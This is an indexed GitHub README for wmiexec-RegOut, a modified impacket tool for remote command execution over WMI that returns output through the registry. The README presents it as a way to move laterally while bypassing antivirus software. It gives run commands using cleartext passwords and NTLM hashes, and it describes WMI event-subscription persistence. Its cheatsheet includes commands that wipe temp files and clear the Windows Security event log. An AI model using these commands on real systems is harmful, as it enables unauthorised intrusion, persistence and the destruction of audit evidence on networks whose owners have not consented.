Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/XiaoliChan/wmiexec-RegOut
Modify version of impacket wmiexec.py, get output(data,response) from registry, don't need SMB connection, also bypassing antivirus-software in lateral movement like WMIHACKER.
https://github.com/XiaoliChan/wmiexec-RegOut
Last synced: 22 days ago
JSON representation
Modify version of impacket wmiexec.py, get output(data,response) from registry, don't need SMB connection, also bypassing antivirus-software in lateral movement like WMIHACKER.
- Host: GitHub
- URL: https://github.com/XiaoliChan/wmiexec-RegOut
- Owner: XiaoliChan
- Archived: true
- Created: 2021-09-18T01:57:12.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2023-04-04T06:38:08.000Z (over 1 year ago)
- Last Synced: 2024-06-06T20:04:52.375Z (6 months ago)
- Language: Python
- Homepage:
- Size: 49.8 KB
- Stars: 280
- Watchers: 4
- Forks: 35
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - XiaoliChan/wmiexec-RegOut - Modify version of impacket wmiexec.py, get output(data,response) from registry, don't need SMB connection, also bypassing antivirus-software in lateral movement like WMIHACKER. (Python)
README
## :no_entry: [DEPRECATED] Active at https://github.com/XiaoliChan/wmiexec-Pro
# wmiexec-RegOut
Modify version of impacket wmiexec.py,wmipersist.py. Got output(data,response) from registry, don't need SMB connection, but I'm in the bad code :(
# Table of content
* [Overview](#overview)
* [Requirements](#Requirements)
* [Usage](#Usage)
* [Cheatsheet](#Cheatsheet)
* [Todo](#todo)
* [References](#References)## Specially Thanks to:
- ### [@rootclay](https://github.com/rootclay), wechat: _xiangshan
## Overview
In original wmiexec.py, it get response from smb connection (port 445,139). Unfortunately, some antivirus software are monitoring these ports as high risk.
In this case, I drop smb connection function and use others method to execute command.- wmiexec-reg-sch-UnderNT6-wip.py: Executed command by using win32-scheduledjob class. According to xiangshan, win32-scheduledjob class only works under windows NT6 (windows-server 2003).
BTW, win32_scheduledjob has been disabled by default after windows NT6. Here is the way how to enable it.
```text
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
```- wmipersist-wip.py `(Highly recommend, !!!only works on impacket v0.9.24!!!)`: A Python version of [WMIHACKER](https://github.com/rootclay/WMIHACKER), which I picked the vbs template from it. Attacker can use it to do lateral movement safety under antivirus-software running.
- wmiexec-regOut.py: Just a simple Win32_Process.create method example .
## How it works?
- ### wmiexec-wip.py workflow:
Step 1:
- WMIC authenticated remotlyStep 2:
- Use win32process class and call create method to execute command. Then, write down the result into C:\windows\temp directory named [uuid].txtStep 3:
- Encode the file content to base64 strings (need to wait a few seconds)Step 4:
- Add the converted base64 string into registry, and key name call [uuid]Step 5:
- Get the base64 strings remotly and decode it locally.- ### wmipersist-wip.py workflow:
Step 1:
- Add custom vbs script into ActiveScriptEventConsumer class.Step 2:
- Creating an Event Filter.Step 3:
- Trigger FilterToConsumerBinding class to PWNED!## Requirements
Generally, you just need to install official impacket.
- [Portal](https://github.com/SecureAuthCorp/impacket)## Usage
- ### wmiexec-wip.py usage:
With cleartext password
```bash
python3 wmiexec-reg.py administrator:[email protected] 'whoami'
```
![image](https://user-images.githubusercontent.com/30458572/134797669-6d62e72f-a005-4001-aa47-09a9ffe86ae1.png)With NTLM hashes
```bash
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
```
![image](https://user-images.githubusercontent.com/30458572/137060383-7c13086c-0d4a-424d-a00a-561de836cacb.png)- ### wmipersist-wip.py usage (Default is no output):
With cleartext password (without output)
```bash
python3 wmipersist-wip.py administrator:[email protected] 'command'
```
![image](https://user-images.githubusercontent.com/30458572/137947814-2185d6b4-a20c-4bfc-804b-e5953bb016ac.png)With NTLM hashes
```bash
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'
```
![image](https://user-images.githubusercontent.com/30458572/137948043-6d419057-5b62-45d4-a4df-e625b604dddd.png)With output
```bash
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output
```
![image](https://user-images.githubusercontent.com/30458572/137948435-3f0fc14b-252f-411a-a681-9ba323edccb0.png)
![image](https://user-images.githubusercontent.com/30458572/137948639-c5f75993-bde2-47b9-8717-5e5309a36dd4.png)
Under Huorong antivirus-software (Using WMIHACKER VBS template!!!)
![2ef86c8d934dc45498478aa9aedd91c](https://user-images.githubusercontent.com/30458572/137949219-b849be89-321e-4d1b-abf9-951509544679.png)## Cheatsheet
- Do not forget to clean up temp directory after run command with out put.
Command: `del /q /f /s C:\windows\temp\*`
![image](https://user-images.githubusercontent.com/30458572/147390683-5556f7a0-17da-4308-8f16-e82783ab42b3.png)- Command include double quotes.
Make double quotes inside single quotes `wevtutil cl '"security"'`
![image](https://user-images.githubusercontent.com/30458572/147390799-a3725a15-3c1c-4d63-850d-04e372ce04f7.png)
## Todo- New version of wmi toolkit, Comming sonn :)
## References
- https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py
- https://github.com/360-Linton-Lab/WMIHACKER
- https://github.com/FortyNorthSecurity/WMIOps
- https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/operating-system-classes